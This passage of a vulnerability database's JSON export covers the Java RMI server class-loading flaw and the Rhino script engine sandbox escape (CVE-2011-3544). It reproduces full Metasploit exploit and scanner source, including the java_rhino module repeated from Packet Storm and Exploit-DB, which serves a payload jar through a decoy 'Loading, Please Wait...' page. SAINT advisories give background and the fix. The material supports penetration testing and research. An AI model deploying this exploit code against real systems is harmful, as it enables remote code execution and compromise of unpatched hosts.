exception.class_desc.description.class_name.contents == 'java.lang.ClassNotFoundException'\n return true\n end\n end\n\n false\n end\n\n def build_dgc_clean_args(jar_url)\n arguments = []\n\n new_array_annotation = Rex::Java::Serialization::Model::Annotation.new\n new_array_annotation.contents = [\n Rex::Java::Serialization::Model::NullReference.new,\n Rex::Java::Serialization::Model::EndBlockData.new\n ]\n\n new_array_super = Rex::Java::Serialization::Model::ClassDesc.new\n new_array_super.description = Rex::Java::Serialization::Model::NullReference.new\n\n new_array_desc = Rex::Java::Serialization::Model::NewClassDesc.new\n new_array_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, '[Ljava.rmi.server.ObjID;')\n new_array_desc.serial_version = 0x871300b8d02c647e\n new_array_desc.flags = 2\n new_array_desc.fields = []\n new_array_desc.class_annotation = new_array_annotation\n new_array_desc.super_class = new_array_super\n\n array_desc = Rex::Java::Serialization::Model::ClassDesc.new\n array_desc.description = new_array_desc\n\n new_array = Rex::Java::Serialization::Model::NewArray.new\n new_array.type = 'java.rmi.server.ObjID;'\n new_array.values = []\n new_array.array_description = array_desc\n\n arguments << new_array\n arguments << Rex::Java::Serialization::Model::BlockData.new(nil, \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\")\n\n new_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new\n new_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'metasploit.RMILoader')\n new_class_desc.serial_version = 0xa16544ba26f9c2f4\n new_class_desc.flags = 2\n new_class_desc.fields = []\n new_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new\n new_class_desc.class_annotation.contents = [\n Rex::Java::Serialization::Model::Utf.new(nil, jar_url),\n Rex::Java::Serialization::Model::EndBlockData.new\n ]\n new_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new\n new_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new\n\n new_object = Rex::Java::Serialization::Model::NewObject.new\n new_object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new\n new_object.class_desc.description = new_class_desc\n new_object.class_data = []\n\n arguments << new_object\n\n arguments << Rex::Java::Serialization::Model::BlockData.new(nil, \"\\x00\")\n\n arguments\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/java_rmi_server.rb"}, {"lastseen": "2018-09-18T09:40:42", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "references": [], "description": "Detect Java RMI endpoints", "reporter": "Rapid7", "published": "2012-04-29T23:10:49", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/misc/java_rmi_server.rb", "type": "metasploit", "title": "Java RMI Server Insecure Endpoint Code Execution Scanner", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3556"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-07-24T13:26:21", "metasploitReliability": "Normal", "id": "MSF:AUXILIARY/SCANNER/MISC/JAVA_RMI_SERVER", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/java/serialization'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Java::Rmi::Client\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'Java RMI Server Insecure Endpoint Code Execution Scanner',\n 'Description' => 'Detect Java RMI endpoints',\n 'Author' => ['mihi', 'hdm'],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n # RMI protocol specification\n [ 'URL', 'http://download.oracle.com/javase/1.3/docs/guide/rmi/spec/rmi-protocol.html'],\n [ 'URL', 'http://www.securitytracker.com/id?1026215'],\n [ 'CVE', '2011-3556']\n ],\n 'DisclosureDate' => 'Oct 15 2011'\n )\n\n register_options(\n [\n Opt::RPORT(1099)\n ])\n end\n\n def run_host(target_host)\n vprint_status(\"Sending RMI Header...\")\n connect\n\n send_header\n ack = recv_protocol_ack\n if ack.nil?\n print_error(\"Failed to negotiate RMI protocol\")\n disconnect\n return\n end\n\n # Determine if the instance allows remote class loading\n vprint_status(\"Sending RMI Call...\")\n jar = Rex::Text.rand_text_alpha(rand(8)+1) + '.jar'\n jar_url = \"file:RMIClassLoaderSecurityTest/\" + jar\n\n dgc_interface_hash = calculate_interface_hash(\n [\n {\n name: 'clean',\n descriptor: '([Ljava/rmi/server/ObjID;JLjava/rmi/dgc/VMID;Z)V',\n exceptions: ['java.rmi.RemoteException']\n },\n {\n name: 'dirty',\n descriptor: '([Ljava/rmi/server/ObjID;JLjava/rmi/dgc/Lease;)Ljava/rmi/dgc/Lease;',\n exceptions: ['java.rmi.RemoteException']\n }\n ]\n )\n\n # JDK 1.1 stub protocol\n # Interface hash: 0xf6b6898d8bf28643 (sun.rmi.transport.DGCImpl_Stub)\n # Operation: 0 (public void clean(ObjID[] paramArrayOfObjID, long paramLong, VMID paramVMID, boolean paramBoolean))\n send_call(\n object_number: 2,\n uid_number: 0,\n uid_time: 0,\n uid_count: 0,\n operation: 0,\n hash: dgc_interface_hash,\n arguments: build_dgc_clean_args(jar_url)\n )\n return_value = recv_return\n\n if return_value.nil?\n print_good(\"Failed to send RMI Call, anyway JAVA RMI Endpoint detected\")\n report_service(:host => rhost, :port => rport, :name => \"java-rmi\", :info => \"\")\n return\n end\n\n if return_value.is_exception? && loader_enabled?(return_value.value)\n print_good(\"#{rhost}:#{rport} Java RMI Endpoint Detected: Class Loader Enabled\")\n svc = report_service(:host => rhost, :port => rport, :name => \"java-rmi\", :info => \"Class Loader: Enabled\")\n report_vuln(\n :host => rhost,\n :service => svc,\n :name => self.name,\n :info => \"Module #{self.fullname} confirmed remote code execution via this RMI service\",\n :refs => self.references\n )\n else\n print_status(\"#{rhost}:#{rport} Java RMI Endpoint Detected: Class Loader Disabled\")\n report_service(:host => rhost, :port => rport, :name => \"java-rmi\", :info => \"Class Loader: Disabled\")\n end\n end\n\n def loader_enabled?(exception_stack)\n exception_stack.each do |exception|\n if exception.class == Rex::Java::Serialization::Model::NewObject &&\n exception.class_desc.description.class == Rex::Java::Serialization::Model::NewClassDesc &&\n exception.class_desc.description.class_name.contents == 'java.lang.ClassNotFoundException'&&\n [Rex::Java::Serialization::Model::NullReference, Rex::Java::Serialization::Model::Reference].include?(exception.class_data[0].class) &&\n !exception.class_data[1].contents.include?('RMI class loader disabled')\n return true\n end\n end\n\n false\n end\n\n # class: sun.rmi.trasnport.DGC\n # method: public void clean(ObjID[] paramArrayOfObjID, long paramLong, VMID paramVMID, boolean paramBoolean)\n def build_dgc_clean_args(jar_url)\n arguments = []\n\n new_array_annotation = Rex::Java::Serialization::Model::Annotation.new\n new_array_annotation.contents = [\n Rex::Java::Serialization::Model::NullReference.new,\n Rex::Java::Serialization::Model::EndBlockData.new\n ]\n\n new_array_super = Rex::Java::Serialization::Model::ClassDesc.new\n new_array_super.description = Rex::Java::Serialization::Model::NullReference.new\n\n new_array_desc = Rex::Java::Serialization::Model::NewClassDesc.new\n new_array_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, '[Ljava.rmi.server.ObjID;')\n new_array_desc.serial_version = 0x871300b8d02c647e\n new_array_desc.flags = 2\n new_array_desc.fields = []\n new_array_desc.class_annotation = new_array_annotation\n new_array_desc.super_class = new_array_super\n\n array_desc = Rex::Java::Serialization::Model::ClassDesc.new\n array_desc.description = new_array_desc\n\n new_array = Rex::Java::Serialization::Model::NewArray.new\n new_array.type = 'java.rmi.server.ObjID;'\n new_array.values = []\n new_array.array_description = array_desc\n\n # ObjID[] paramArrayOfObjID\n arguments << new_array\n\n # long paramLong\n arguments << Rex::Java::Serialization::Model::BlockData.new(nil, \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\")\n\n new_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new\n new_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'metasploit.RMILoader')\n new_class_desc.serial_version = 0xa16544ba26f9c2f4\n new_class_desc.flags = 2\n new_class_desc.fields = []\n new_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new\n new_class_desc.class_annotation.contents = [\n Rex::Java::Serialization::Model::Utf.new(nil, jar_url),\n Rex::Java::Serialization::Model::EndBlockData.new\n ]\n new_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new\n new_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new\n\n new_object = Rex::Java::Serialization::Model::NewObject.new\n new_object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new\n new_object.class_desc.description = new_class_desc\n new_object.class_data = []\n\n # VMID paramVMID\n arguments << new_object\n\n # boolean paramBoolean\n arguments << Rex::Java::Serialization::Model::BlockData.new(nil, \"\\x00\")\n\n arguments\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/misc/java_rmi_server.rb"}, {"lastseen": "2018-09-18T09:40:42", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "references": [], "description": "This module exploits a vulnerability in the Rhino Script Engine that can be used by a Java Applet to run arbitrary Java code outside of the sandbox. The vulnerability affects version 7 and version 6 update 27 and earlier, and should work on any browser that supports Java (for example: IE, Firefox, Google Chrome, etc)", "reporter": "Rapid7", "published": "2011-11-30T00:05:20", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/multi/browser/java_rhino.rb", "type": "metasploit", "title": "Java Applet Rhino Script Engine Remote Code Execution", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3544"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-07-24T13:26:21", "metasploitReliability": "Excellent", "id": "MSF:EXPLOIT/MULTI/BROWSER/JAVA_RHINO", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({ :javascript => false })\n\n def initialize( info = {} )\n super( update_info( info,\n 'Name' => 'Java Applet Rhino Script Engine Remote Code Execution',\n 'Description' => %q{\n This module exploits a vulnerability in the Rhino Script Engine that\n can be used by a Java Applet to run arbitrary Java code outside of\n the sandbox. The vulnerability affects version 7 and version 6 update\n 27 and earlier, and should work on any browser that supports Java\n (for example: IE, Firefox, Google Chrome, etc)\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Michael Schierl', # Discovery\n 'juan vazquez', # metasploit module\n 'Edward D. Teach <teach[at]consortium-of-pwners.net>',\n 'sinn3r'\n ],\n 'References' =>\n [\n [ 'CVE', '2011-3544' ],\n [ 'OSVDB', '76500' ],\n [ 'ZDI', '11-305' ],\n [ 'URL', 'http://schierlm.users.sourceforge.net/CVE-2011-3544.html' ],\n ],\n 'Platform' => %w{ java linux win },\n 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },\n 'Targets' =>\n [\n [ 'Generic (Java Payload)',\n {\n 'Arch' => ARCH_JAVA,\n }\n ],\n [ 'Windows Universal',\n {\n 'Arch' => ARCH_X86,\n 'Platform' => 'win'\n }\n ],\n [ 'Apple OSX',\n {\n 'ARCH' => ARCH_X86,\n 'Platform' => 'osx'\n }\n ],\n [ 'Linux x86',\n {\n 'Arch' => ARCH_X86,\n 'Platform' => 'linux'\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Oct 18 2011'\n ))\n end\n\n\n def on_request_uri( cli, request )\n if not request.uri.match(/\\.jar$/i)\n if not request.uri.match(/\\/$/)\n send_redirect(cli, get_resource() + '/', '')\n return\n end\n\n print_status(\"#{self.name} handling request\")\n\n send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )\n return\n end\n\n paths = [\n [ \"Exploit.class\" ]\n ]\n\n p = regenerate_payload(cli)\n\n jar = p.encoded_jar\n paths.each do |path|\n 1.upto(path.length - 1) do |idx|\n full = path[0,idx].join(\"/\") + \"/\"\n if !(jar.entries.map{|e|e.name}.include?(full))\n jar.add_file(full, '')\n end\n end\n fd = File.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2011-3544\", path ), \"rb\")\n data = fd.read(fd.stat.size)\n jar.add_file(path.join(\"/\"), data)\n fd.close\n end\n\n print_status(\"Sending Applet.jar\")\n send_response( cli, jar.pack, { 'Content-Type' => \"application/octet-stream\" } )\n\n handler( cli )\n end\n\n def generate_html\n html = \"<html><head></head>\"\n html += \"<body>\"\n html += \"<applet archive=\\\"Exploit.jar\\\" code=\\\"Exploit.class\\\" width=\\\"1\\\" height=\\\"1\\\">\"\n html += \"</applet></body></html>\"\n return html\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/browser/java_rhino.rb"}], "packetstorm": [{"lastseen": "2016-12-05T22:14:53", "references": [], "edition": 1, "description": "", "reporter": "sinn3r", "published": "2011-11-30T00:00:00", "type": "packetstorm", "title": "Java Applet Rhino Script Engine Remote Code Execution", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3544"], "modified": "2011-11-30T00:00:00", "href": "https://packetstormsecurity.com/files/107407/Java-Applet-Rhino-Script-Engine-Remote-Code-Execution.html", "id": "PACKETSTORM:107407", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \nrequire 'rex' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize( info = {} ) \nsuper( update_info( info, \n'Name' => 'Java Applet Rhino Script Engine Remote Code Execution', \n'Description' => %q{ \nThis module exploits a vulnerability in the Rhino Script Engine that \ncan be used by a Java Applet to run arbitrary Java code outside of \nthe sandbox. The vulnerability affects version 7 and version 6 update \n27 and earlier, and should work on any browser that supports Java \n(for example: IE, Firefox, Google Chrome, etc) \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Michael Schierl', # Discovery \n'juan vazquez', # metasploit module \n'Edward D. Teach <teach@consortium-of-pwners.net>', \n'sinn3r' \n], \n'References' => \n[ \n[ 'CVE', '2011-3544' ], \n[ 'OSVDB', '76500' ], # 76500 and 76499 have contents mixed \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-305/' ], \n[ 'URL', 'http://schierlm.users.sourceforge.net/CVE-2011-3544.html' ], \n], \n'Platform' => [ 'java', 'win', 'linux' ], \n'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, \n'Targets' => \n[ \n[ 'Generic (Java Payload)', \n{ \n'Arch' => ARCH_JAVA, \n} \n], \n[ 'Windows Universal', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'win' \n} \n], \n[ 'Apple OSX', \n{ \n'ARCH' => ARCH_X86, \n'Platform' => 'osx' \n} \n], \n[ 'Linux x86', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux' \n} \n] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Oct 18 2011' \n)) \nend \n \n \ndef on_request_uri( cli, request ) \nif not request.uri.match(/\\.jar$/i) \nif not request.uri.match(/\\/$/) \nsend_redirect(cli, get_resource() + '/', '') \nreturn \nend \n \nprint_status(\"#{self.name} handling request from #{cli.peerhost}:#{cli.peerport}...\") \n \nsend_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } ) \nreturn \nend \n \npaths = [ \n[ \"Exploit.class\" ] \n] \n \np = regenerate_payload(cli) \n \njar = p.encoded_jar \npaths.each do |path| \n1.upto(path.length - 1) do |idx| \nfull = path[0,idx].join(\"/\") + \"/\" \nif !(jar.entries.map{|e|e.name}.include?(full)) \njar.add_file(full, '') \nend \nend \nfd = File.open(File.join( Msf::Config.install_root, \"data\", \"exploits\", \"cve-2011-3544\", path ), \"rb\") \ndata = fd.read(fd.stat.size) \njar.add_file(path.join(\"/\"), data) \nfd.close \nend \n \nprint_status( \"Sending Applet.jar to #{cli.peerhost}:#{cli.peerport}...\" ) \nsend_response( cli, jar.pack, { 'Content-Type' => \"application/octet-stream\" } ) \n \nhandler( cli ) \nend \n \ndef generate_html \nhtml = \"<html><head><title>Loading, Please Wait...</title></head>\" \nhtml += \"<body><center>Loading, Please Wait...</center>\" \nhtml += \"<applet archive=\\\"Exploit.jar\\\" code=\\\"Exploit.class\\\" width=\\\"1\\\" height=\\\"1\\\">\" \nhtml += \"</applet></body></html>\" \nreturn html \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/107407/java_rhino.rb.txt"}], "saint": [{"lastseen": "2016-10-03T15:01:54", "references": [], "description": "Added: 12/02/2011 \nCVE: [CVE-2011-3544](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544>) \nBID: [50218](<http://www.securityfocus.com/bid/50218>) \nOSVDB: [76500](<http://www.osvdb.org/76500>) \n\n\n### Background\n\nJava is a programming language that compiles programs to bytecode, which is then executed inside a Java Virtual Machine. This is optimal for applications that must run on various hardware platforms, such as web applets. \nJava includes a version of Javascript called Rhino. In addition to providing basic Javascript functionality, Rhino also allows Java objects to interact with Javascript variables. \n\n### Problem\n\nRhino content is run outside the control of the Java SecurityManager, with its own security layer. A vulnerability exists when a Rhino script defines a toString method for the '_this_' object, where the method can disable the SecurityManager for the entire applet and run malicious payload. If an _error_ object's _message_ property is set to _this_ and returned, an attacker can execute arbitrary code on the target system. \n\n### Resolution\n\nUpgrade to Oracle JRE 6 Update 28 or later. \n\n### References\n\n<http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html> \n<http://schierlm.users.sourceforge.net/CVE-2011-3544.html> \n\n\n### Limitations\n\nThis exploit has been tested against Oracle JRE 6 Update 27 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "reporter": "SAINT Corporation", "published": "2011-12-02T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "saint", "title": "Oracle Java Rhino Script Engine Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3544"], "modified": "2011-12-02T00:00:00", "id": "SAINT:582666CF331D1209695508846FE3A6E0", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/oracle_java_rhino_script_exec", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-14T16:58:07", "references": [], "edition": 1, "description": "Added: 12/02/2011 \nCVE: [CVE-2011-3544](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544>) \nBID: [50218](<http://www.securityfocus.com/bid/50218>) \nOSVDB: [76500](<http://www.osvdb.org/76500>) \n\n\n### Background\n\nJava is a programming language that compiles programs to bytecode, which is then executed inside a Java Virtual Machine. This is optimal for applications that must run on various hardware platforms, such as web applets. \nJava includes a version of Javascript called Rhino. In addition to providing basic Javascript functionality, Rhino also allows Java objects to interact with Javascript variables. \n\n### Problem\n\nRhino content is run outside the control of the Java SecurityManager, with its own security layer. A vulnerability exists when a Rhino script defines a toString method for the '_this_' object, where the method can disable the SecurityManager for the entire applet and run malicious payload. If an _error_ object's _message_ property is set to _this_ and returned, an attacker can execute arbitrary code on the target system. \n\n### Resolution\n\nUpgrade to Oracle JRE 6 Update 28 or later. \n\n### References\n\n<http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html> \n<http://schierlm.users.sourceforge.net/CVE-2011-3544.html> \n\n\n### Limitations\n\nThis exploit has been tested against Oracle JRE 6 Update 27 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "reporter": "SAINT Corporation", "published": "2011-12-02T00:00:00", "type": "saint", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Oracle Java Rhino Script Engine Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3544"], "modified": "2011-12-02T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/oracle_java_rhino_script_exec", "id": "SAINT:EA207030303A0FBD6604688A96A1F85F", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:15", "references": [], "description": "Added: 12/02/2011 \nCVE: [CVE-2011-3544](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544>) \nBID: [50218](<http://www.securityfocus.com/bid/50218>) \nOSVDB: [76500](<http://www.osvdb.org/76500>) \n\n\n### Background\n\nJava is a programming language that compiles programs to bytecode, which is then executed inside a Java Virtual Machine. This is optimal for applications that must run on various hardware platforms, such as web applets. \nJava includes a version of Javascript called Rhino. In addition to providing basic Javascript functionality, Rhino also allows Java objects to interact with Javascript variables. \n\n### Problem\n\nRhino content is run outside the control of the Java SecurityManager, with its own security layer. A vulnerability exists when a Rhino script defines a toString method for the '_this_' object, where the method can disable the SecurityManager for the entire applet and run malicious payload. If an _error_ object's _message_ property is set to _this_ and returned, an attacker can execute arbitrary code on the target system. \n\n### Resolution\n\nUpgrade to Oracle JRE 6 Update 28 or later. \n\n### References\n\n<http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html> \n<http://schierlm.users.sourceforge.net/CVE-2011-3544.html> \n\n\n### Limitations\n\nThis exploit has been tested against Oracle JRE 6 Update 27 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "edition": 3, "reporter": "SAINT Corporation", "published": "2011-12-02T00:00:00", "title": "Oracle Java Rhino Script Engine Code Execution", "type": "saint", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3544"], "modified": "2011-12-02T00:00:00", "id": "SAINT:DEBA35B9575FFBBADB9C5A77DDDECF95", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/oracle_java_rhino_script_exec", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T09:17:31", "osvdbidlist": ["76500"], "references": [], "description": "Java Applet Rhino Script Engine Remote Code Execution. CVE-2011-3544. Remote exploits for multiple platform", "edition": 1, "reporter": "metasploit", "published": "2011-11-30T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "Java Applet Rhino Script Engine Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3544"], "modified": "2011-11-30T00:00:00", "id": "EDB-ID:18171", "href": "https://www.exploit-db.com/exploits/18171/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'rex'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize( info = {} )\r\n\t\tsuper( update_info( info,\r\n\t\t\t'Name' => 'Java Applet Rhino Script Engine Remote Code Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in the Rhino Script Engine that\r\n\t\t\t\tcan be used by a Java Applet to run arbitrary Java code outside of\r\n\t\t\t\tthe sandbox. The vulnerability affects version 7 and version 6 update\r\n\t\t\t\t27 and earlier, and should work on any browser that supports Java\r\n\t\t\t\t(for example: IE, Firefox, Google Chrome, etc)\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Michael Schierl', # Discovery\r\n\t\t\t\t\t'juan vazquez', # metasploit module\r\n\t\t\t\t\t'Edward D. Teach <teach@consortium-of-pwners.net>',\r\n\t\t\t\t\t'sinn3r'\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2011-3544' ],\r\n\t\t\t\t\t[ 'OSVDB', '76500' ], # 76500 and 76499 have contents mixed\r\n\t\t\t\t\t[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-305/' ],\r\n\t\t\t\t\t[ 'URL', 'http://schierlm.users.sourceforge.net/CVE-2011-3544.html' ],\r\n\t\t\t\t],\r\n\t\t\t'Platform' => [ 'java', 'win', 'linux' ],\r\n\t\t\t'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Generic (Java Payload)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_JAVA,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Windows Universal',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'win'\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Apple OSX',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'ARCH' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'osx'\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Linux x86',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'linux'\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Oct 18 2011'\r\n\t\t\t))\r\n\tend\r\n\r\n\r\n\tdef on_request_uri( cli, request )\r\n\t\tif not request.uri.match(/\\.jar$/i)\r\n\t\t\tif not request.uri.match(/\\/$/)\r\n\t\t\t\tsend_redirect(cli, get_resource() + '/', '')\r\n\t\t\t\treturn\r\n\t\t\tend\r\n\r\n\t\t\tprint_status(\"#{self.name} handling request from #{cli.peerhost}:#{cli.peerport}...\")\r\n\r\n\t\t\tsend_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tpaths = [\r\n\t\t\t[ \"Exploit.class\" ]\r\n\t\t]\r\n\r\n\t\tp = regenerate_payload(cli)\r\n\r\n\t\tjar = p.encoded_jar\r\n\t\tpaths.each do |path|\r\n\t\t\t1.upto(path.length - 1) do |idx|\r\n\t\t\t\tfull = path[0,idx].join(\"/\") + \"/\"\r\n\t\t\t\tif !(jar.entries.map{|e|e.name}.include?(full))\r\n\t\t\t\t\tjar.add_file(full, '')\r\n\t\t\t\tend\r\n\t\t\tend\r\n\t\t\tfd = File.open(File.join( Msf::Config.install_root, \"data\", \"exploits\", \"cve-2011-3544\", path ), \"rb\")\r\n\t\t\tdata = fd.read(fd.stat.size)\r\n\t\t\tjar.add_file(path.join(\"/\"), data)\r\n\t\t\tfd.close\r\n\t\tend\r\n\r\n\t\tprint_status( \"Sending Applet.jar to #{cli.peerhost}:#{cli.peerport}...\" )\r\n\t\tsend_response( cli, jar.pack, { 'Content-Type' => \"application/octet-stream\" } )\r\n\r\n\t\thandler( cli )\r\n\tend\r\n\r\n\tdef generate_html\r\n\t\thtml = \"<html><head><title>Loading, Please Wait...</title></head>\"\r\n\t\thtml += \"<body><center>Loading, Please Wait...</center>\"\r\n\t\thtml += \"<applet archive=\\\"Exploit.jar\\\" code=\\\"Exploit.class\\\" width=\\\"1\\\" height=\\\"1\\\">\"\r\n\t\thtml += \"</applet></body></html>\"\r\n\t\treturn html\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/18171/"}], "canvas": [{"lastseen": "2016-09-25T14:14:00", "references": [], "description": "**Name**| java_rhino \n---|--- \n**CVE**| CVE-2011-3544 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| java_rhino \n**Notes**| CVE Name: CVE-2011-3544 \nVENDOR: Sun \nOSVDB: http://osvdb.org/show/osvdb/76500 \nRepeatability: Infinite (client side - no crash) \nReferences: http://schierlm.users.sourceforge.net/CVE-2011-3544.html \nCVE Url: 